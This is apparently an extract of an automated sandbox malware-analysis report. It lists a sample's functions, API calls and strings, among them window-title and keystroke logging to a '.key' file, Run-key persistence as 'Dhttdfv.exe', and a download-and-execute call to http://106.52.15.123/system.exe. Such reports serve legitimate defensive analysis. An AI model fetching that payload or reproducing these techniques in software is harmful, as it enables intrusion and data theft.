                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$FreeLoad$Initialize
                                                                    • String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
                                                                    • API String ID: 1826426203-3340630095
                                                                    • Opcode ID: 389cadcfb6cb323307994a8851b306d3d9bf33a34bb4d3a446bcc0fb61cd25ac
                                                                    • Instruction ID: 49c363ad73918079f0f3afb1a7021305375387cfaa05218572d35b3f2b66e63c
                                                                    • Opcode Fuzzy Hash: 389cadcfb6cb323307994a8851b306d3d9bf33a34bb4d3a446bcc0fb61cd25ac
                                                                    • Instruction Fuzzy Hash: 00412C70E00219EFDB10DBA5CC88DEFBBB9FF88694B108559F505E7215DB75A901CBA0
                                                                    Function 10004967 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 79stringfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000497F
                                                                    • strcat.MSVCRT(?,10012A68), ref: 10004991
                                                                    • strcat.MSVCRT(?,Default,?,10012A68), ref: 100049A2
                                                                    • strcat.MSVCRT(?,.key,?,Default,?,10012A68), ref: 100049B3
                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100049D4
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 100049E2
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 100049F6
                                                                    • lstrlenA.KERNEL32(?), ref: 10004A05
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10004A0A
                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 10004A30
                                                                    • WriteFile.KERNEL32(?,00000000,00000000), ref: 10004A37
                                                                    • CloseHandle.KERNEL32(?), ref: 10004A40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$strcat$lstrlen$??2@CloseCreateDirectoryHandlePointerSizeSystemWrite
                                                                    • String ID: .key$Default
                                                                    • API String ID: 3208975923-1583214558
                                                                    • Opcode ID: 4a9a84d2db77241e225f3f2851328a80a9c70e429372d0f514ed70e2732cc4af
                                                                    • Instruction ID: 8db7b2cb8780ea1a752c5c57170ae7a29ec2482b675d31af14b714fd696e0164
                                                                    • Opcode Fuzzy Hash: 4a9a84d2db77241e225f3f2851328a80a9c70e429372d0f514ed70e2732cc4af
                                                                    • Instruction Fuzzy Hash: 6F2153B5900228BBEB10DBA4CC89FDE7F7DEB46390F504161F645E6056DB705E85CBA0
                                                                    Function 10007289 Relevance: 24.0, APIs: 3, Strings: 13, Instructions: 40stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 407 10007289-100072e6 call 1000712b lstrlenA 410 100072f4-100072fa lstrlenA 407->410 411 100072e8-100072ee lstrcpyA 407->411 411->410
                                                                    APIs
                                                                      • Part of subcall function 1000712B: memset.MSVCRT ref: 10007157
                                                                      • Part of subcall function 1000712B: memset.MSVCRT ref: 10007169
                                                                      • Part of subcall function 1000712B: wsprintfA.USER32 ref: 1000720F
                                                                    • lstrlenA.KERNEL32(?,?,?,759183C0,00000100), ref: 100072E2
                                                                    • lstrcpyA.KERNEL32(?,Default,?,?,759183C0,00000100), ref: 100072EE
                                                                    • lstrlenA.KERNEL32(?,?,?,759183C0,00000100), ref: 100072F5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlenmemset$lstrcpywsprintf
                                                                    • String ID: C$Default$G$c$e$n$n$o$o$p$r$t$u
                                                                    • API String ID: 1346883434-148360246
                                                                    • Opcode ID: 7b9f11020c9a38ff0127635762f09269e694f158993faf986e64edac5c2f7f63
                                                                    • Instruction ID: a2785ca80c62f8d2e8f17244649445ab59a775b60a8b2fed68388d2ecc9b4b18
                                                                    • Opcode Fuzzy Hash: 7b9f11020c9a38ff0127635762f09269e694f158993faf986e64edac5c2f7f63
                                                                    • Instruction Fuzzy Hash: D6014410C082D8F9EB02D7A88808B9EBFB59F52648F0480D8D58466286C7BA5329C776
                                                                    Function 100072FB Relevance: 16.5, APIs: 3, Strings: 8, Instructions: 36stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 1000712B: memset.MSVCRT ref: 10007157
                                                                      • Part of subcall function 1000712B: memset.MSVCRT ref: 10007169
                                                                      • Part of subcall function 1000712B: wsprintfA.USER32 ref: 1000720F
                                                                    • lstrlenA.KERNEL32(?,?,?,759183C0,00000000), ref: 10007344
                                                                    • lstrcpyA.KERNEL32(?,1001348C,?,?,759183C0,00000000), ref: 10007350
                                                                    • lstrlenA.KERNEL32(?,?,?,759183C0,00000000), ref: 10007357
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlenmemset$lstrcpywsprintf
                                                                    • String ID: M$T$a$e$i$k$m$r
                                                                    • API String ID: 1346883434-394501062
                                                                    • Opcode ID: 758bd59863ab867d02f0ac739eeb28c0c0cf3f15cf9d61a7406831dee3f063e2
                                                                    • Instruction ID: 219cb33504d48bea9b78a0e11c2c4c381b6ea61eb956ea9d1f4f52c5110286c3
                                                                    • Opcode Fuzzy Hash: 758bd59863ab867d02f0ac739eeb28c0c0cf3f15cf9d61a7406831dee3f063e2
                                                                    • Instruction Fuzzy Hash: 7EF08621D082C8FAEF0297A88C48BDE7FB99F52748F0480D9E95466143D3BA5629C776
                                                                    Function 1000723A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 33stringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 1000712B: memset.MSVCRT ref: 10007157
                                                                      • Part of subcall function 1000712B: memset.MSVCRT ref: 10007169
                                                                      • Part of subcall function 1000712B: wsprintfA.USER32 ref: 1000720F
                                                                    • lstrlenA.KERNEL32(?,10007C7D,?), ref: 10007272
                                                                    • gethostname.WS2_32(?,?), ref: 1000727C
                                                                    • lstrlenA.KERNEL32(?), ref: 10007283
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlenmemset$gethostnamewsprintf
                                                                    • String ID: H$o$s$t
                                                                    • API String ID: 713918090-2997942591
                                                                    • Opcode ID: ff66edb42a3f77dad9a39df39677ec2130cdafcac361e2011161291dac322d02
                                                                    • Instruction ID: 78a15c83ce98593eebf513f4d2a1a5e8de6aa53cd44efa4dc9344339ca77b845
                                                                    • Opcode Fuzzy Hash: ff66edb42a3f77dad9a39df39677ec2130cdafcac361e2011161291dac322d02
                                                                    • Instruction Fuzzy Hash: 53F0F621804288BAEB029B54CC04EEE7F79EB42684F048098F90462141D7796615C7B2
                                                                    Function 10004A4B Relevance: 12.1, APIs: 8, Instructions: 76stringtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 10004A65
                                                                    • GetForegroundWindow.USER32 ref: 10004A6D
                                                                    • GetWindowTextA.USER32(00000000,1001517C,00000400), ref: 10004A7B
                                                                    • lstrlenA.KERNEL32(1001517C), ref: 10004AAC
                                                                    • GetLocalTime.KERNEL32(?), ref: 10004ABA
                                                                    • wsprintfA.USER32 ref: 10004AEB
                                                                      • Part of subcall function 10004967: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000497F
                                                                      • Part of subcall function 10004967: strcat.MSVCRT(?,10012A68), ref: 10004991
                                                                      • Part of subcall function 10004967: strcat.MSVCRT(?,Default,?,10012A68), ref: 100049A2
                                                                      • Part of subcall function 10004967: strcat.MSVCRT(?,.key,?,Default,?,10012A68), ref: 100049B3
                                                                      • Part of subcall function 10004967: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100049D4
                                                                      • Part of subcall function 10004967: GetFileSize.KERNEL32(00000000,00000000), ref: 100049E2
                                                                      • Part of subcall function 10004967: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 100049F6
                                                                      • Part of subcall function 10004967: lstrlenA.KERNEL32(?), ref: 10004A05
                                                                      • Part of subcall function 10004967: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10004A0A
                                                                      • Part of subcall function 10004967: lstrlenA.KERNEL32(?,?,00000000), ref: 10004A30
                                                                      • Part of subcall function 10004967: WriteFile.KERNEL32(?,00000000,00000000), ref: 10004A37
                                                                      • Part of subcall function 10004967: CloseHandle.KERNEL32(?), ref: 10004A40
                                                                    • memset.MSVCRT ref: 10004B07
                                                                    • memset.MSVCRT ref: 10004B10
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$lstrlenmemsetstrcat$Window$??2@CloseCreateDirectoryForegroundHandleLocalPointerSizeSystemTextTimeWritewsprintf
                                                                    • String ID:
                                                                    • API String ID: 3491631749-0
                                                                    • Opcode ID: 535d09471bceb3f937ff02d182abdf086c0613980c3f6dfee85f864d523c61f2
                                                                    • Instruction ID: 3195fd7b67cbd7dec8d2c359b7969c481bf291de447acad01657929a00bbec76
                                                                    • Opcode Fuzzy Hash: 535d09471bceb3f937ff02d182abdf086c0613980c3f6dfee85f864d523c61f2
                                                                    • Instruction Fuzzy Hash: 392130B1900228BAEB10DBA8CC85FEE77BCEB49385F104061F605E6181D6399A84CB75
                                                                    Function 10001A43 Relevance: 10.6, APIs: 7, Instructions: 85networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 10001E14: setsockopt.WS2_32(?,0000FFFF,00000080,10008E5C,00000004), ref: 10001E39
                                                                      • Part of subcall function 10001E14: CancelIo.KERNEL32(?), ref: 10001E42
                                                                      • Part of subcall function 10001E14: InterlockedExchange.KERNEL32(?,00000000), ref: 10001E4E
                                                                      • Part of subcall function 10001E14: closesocket.WS2_32(?), ref: 10001E57
                                                                      • Part of subcall function 10001E14: SetEvent.KERNEL32(?), ref: 10001E60
                                                                    • ResetEvent.KERNEL32(?,?,1001211C,?), ref: 10001A56
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 10001A67
                                                                    • gethostbyname.WS2_32(?), ref: 10001A78
                                                                    • htons.WS2_32(?), ref: 10001A8D
                                                                    • connect.WS2_32(?,00000002,00000010), ref: 10001AAA
                                                                    • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 10001ACF
                                                                    • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 10001B00
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
                                                                    • String ID:
                                                                    • API String ID: 4281462294-0
                                                                    • Opcode ID: f8e17a7deb9375ed208706a515957b64ff9aed814561be85d6d67c71c794db8b
                                                                    • Instruction ID: aeabb0698825492ed866c5bdd6429c0fd0d9978ebf89e16c99f545c9a45479fe
                                                                    • Opcode Fuzzy Hash: f8e17a7deb9375ed208706a515957b64ff9aed814561be85d6d67c71c794db8b
                                                                    • Instruction Fuzzy Hash: D1215C71500358BFEB109FA4CC85EEBBBFCEF09394F104529F601A62A4D7B19E449B61
                                                                    Function 100094E6 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10009517
                                                                    • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 10009532
                                                                    • RegSetValueExA.KERNEL32(?,Dhttdfv.exe,00000000,00000001,00000000,00000104), ref: 10009550
                                                                    • RegCloseKey.KERNEL32(?), ref: 10009559
                                                                    Strings
                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 10009528
                                                                    • Dhttdfv.exe, xrefs: 10009548
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseFileModuleNameOpenValue
                                                                    • String ID: Dhttdfv.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                                    • API String ID: 1392962279-2969673951
                                                                    • Opcode ID: b13d62c0c1ed68cc402453a4b87372e96c22c28e860dc255a138181a29fab07e
                                                                    • Instruction ID: 868615cf16300b1a4e589fb525f14928a153536476fa17c8de8ebe090884cf96
                                                                    • Opcode Fuzzy Hash: b13d62c0c1ed68cc402453a4b87372e96c22c28e860dc255a138181a29fab07e
                                                                    • Instruction Fuzzy Hash: B8F04F36A44228FBFB209755CC49FDA7B68EB54791F1000A1F744B50D5DAB09A84CA64
                                                                    Function 10001E6D Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 100012F1: VirtualFree.KERNEL32(?,00000000,00008000,?,10001E82,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001303
                                                                    • ??2@YAPAXI@Z.MSVCRT(10007ED6,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001E8E
                                                                    • ??3@YAXPAX@Z.MSVCRT(0000022C,0000022C,10007ED6,10007ED6,00000004,10007ED6,00000004,000000C8,00000004,?,00000006,759183C0,00000000,00000001), ref: 10001EFD
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,0000022C,0000022C,10007ED6,10007ED6,00000004,10007ED6,00000004,000000C8,00000004,?,00000006,759183C0,00000000,00000001), ref: 10001F05
                                                                    • memcpy.MSVCRT(00000000,000000C8,00000001,00000001,0000022C,0000022C,10007ED6,10007ED6,00000004,10007ED6,00000004,000000C8,00000004,?,00000006,759183C0), ref: 10001F14
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,0000022C,00000001,00000004,000000C8,00000004,?,00000006,759183C0,00000000,00000001), ref: 10001F3C
                                                                    • memcpy.MSVCRT(00000000,000000C8,10007ED6,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001EA6
                                                                      • Part of subcall function 1000104C: memcpy.MSVCRT(?,00000006,00000006,00000000,?,?,10001F51,?,00000006,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001074
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$??2@??3@$FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 494799333-0
                                                                    • Opcode ID: 27fbf78ed3b51c8556100a79185e8da1561c2a874bdeedc5818f2b3f8636b7cc
                                                                    • Instruction ID: 118d683cc8a4193673fd0bf7e6b98968ba6b74b9accbddda43626d6b07ee07ab
                                                                    • Opcode Fuzzy Hash: 27fbf78ed3b51c8556100a79185e8da1561c2a874bdeedc5818f2b3f8636b7cc
                                                                    • Instruction Fuzzy Hash: CF319379600204BBFF15EF64C982FEE77AAEF44380F404029F606A6186DFB4AA549B50
                                                                    Function 10007B6A Relevance: 9.1, APIs: 6, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Tablefreemalloc
                                                                    • String ID:
                                                                    • API String ID: 4116887034-0
                                                                    • Opcode ID: a9a782163437b05ab3c8c7e16eab78436f4383197e630ce74bd1a5bb83864cc1
                                                                    • Instruction ID: 492090b11afa6ec3b5ee8b70b78e619307c4815bec6c8d30d93d8fc25b024389
                                                                    • Opcode Fuzzy Hash: a9a782163437b05ab3c8c7e16eab78436f4383197e630ce74bd1a5bb83864cc1
                                                                    • Instruction Fuzzy Hash: C7118236D01619BBF714C795DC81FDEB2ADEF442A0F210066E904E2184D7B4EE0146A4
                                                                    Function 10009563 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 1000956C
                                                                    • CoCreateGuid.OLE32(100095DD,?,100095DD), ref: 10009576
                                                                    • _snprintf.MSVCRT ref: 10009590
                                                                    • CoUninitialize.COMBASE(?,100095DD), ref: 10009599
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateGuidInitializeUninitialize_snprintf
                                                                    • String ID: %08X
                                                                    • API String ID: 61646808-3773563069
                                                                    • Opcode ID: 8ee7ab5f3f56983602ac466d3f439b31c02af002dc1d8de44b72d6b0248929f0
                                                                    • Instruction ID: 88d22e7365e1f16ed96490108e8fbffef4045e25b8fc80be152a820c222d597b
                                                                    • Opcode Fuzzy Hash: 8ee7ab5f3f56983602ac466d3f439b31c02af002dc1d8de44b72d6b0248929f0
                                                                    • Instruction Fuzzy Hash: 6DE02670A0433CBBFB00ABF84C0DF9A3A7CFB00682F404414FA15E6095D630D20087D5
                                                                    Function 10009FBF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 22filenetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • URLDownloadToFileA.URLMON(00000000,http://106.52.15.123/system.exe,C:\Program Files\Windows NT\system.exe,00000000,00000000), ref: 10009FD1
                                                                    • ShellExecuteA.SHELL32(00000000,open,C:\Program Files\Windows NT\system.exe,00000000,00000000,00000005), ref: 10009FE1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DownloadExecuteFileShell
                                                                    • String ID: C:\Program Files\Windows NT\system.exe$http://106.52.15.123/system.exe$open
                                                                    • API String ID: 2825088817-1113267039
                                                                    • Opcode ID: 9d3c8a4c5115a98b2d5ff1a06714790d8711211fbe8859f50e85129c60a7fa12
                                                                    • Instruction ID: a5bb377d1bd2513c596edfc13cbd7ce87bfd62707c7b4eda2b6f00193c169137
                                                                    • Opcode Fuzzy Hash: 9d3c8a4c5115a98b2d5ff1a06714790d8711211fbe8859f50e85129c60a7fa12
                                                                    • Instruction Fuzzy Hash: 9FD0C9329892A079E63097575C4DFEB9F3CCBE3FB2F01402EF608A909886645483C1B1
                                                                    Function 10001E14 Relevance: 7.5, APIs: 5, Instructions: 28COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • setsockopt.WS2_32(?,0000FFFF,00000080,10008E5C,00000004), ref: 10001E39
                                                                    • CancelIo.KERNEL32(?), ref: 10001E42
                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 10001E4E
                                                                    • closesocket.WS2_32(?), ref: 10001E57
                                                                    • SetEvent.KERNEL32(?), ref: 10001E60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                    • String ID:
                                                                    • API String ID: 1486965892-0
                                                                    • Opcode ID: 836b5f37c497276a5c177910c8051b1fe3d23b3599964cc5168669c5bb626d52
                                                                    • Instruction ID: 214bdb797ce9b3806abe695a8f89653cfa2cd86d3a48c32c0ca57aa75e999f02
                                                                    • Opcode Fuzzy Hash: 836b5f37c497276a5c177910c8051b1fe3d23b3599964cc5168669c5bb626d52
                                                                    • Instruction Fuzzy Hash: D5F05431110728EFEB209B95CC4EEC677B8FF05354F104518F782915F4D7B1A9449B50
                                                                    Function 100011A4 Relevance: 6.1, APIs: 4, Instructions: 65memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ftol.MSVCRT ref: 100011DD
                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000006,?,?,?,?,?,10001063,00000000,?,?,10001F51,?), ref: 100011F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual_ftol
                                                                    • String ID:
                                                                    • API String ID: 2737540598-0
                                                                    • Opcode ID: 0c717a01402f860ddbd81e72d06cec5ddd3fc0d17aec082e18a5cc91da5760e6
                                                                    • Instruction ID: 75165211b362c1627f18bd49e2c8b26c5740ac8c1daa3f9b9590968628634e41
                                                                    • Opcode Fuzzy Hash: 0c717a01402f860ddbd81e72d06cec5ddd3fc0d17aec082e18a5cc91da5760e6
                                                                    • Instruction Fuzzy Hash: AC11C171700704ABF314DB65CC86F9A7AE8EF407D1F10852AFA16C6288DAB4E8008750
                                                                    Function 1000A053 Relevance: 6.0, APIs: 4, Instructions: 34synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,75920F00,00000000,00000000,00000000,00000000), ref: 1000A06C
                                                                    • _beginthreadex.MSVCRT ref: 1000A08A
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000A09A
                                                                    • CloseHandle.KERNEL32(?), ref: 1000A0A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
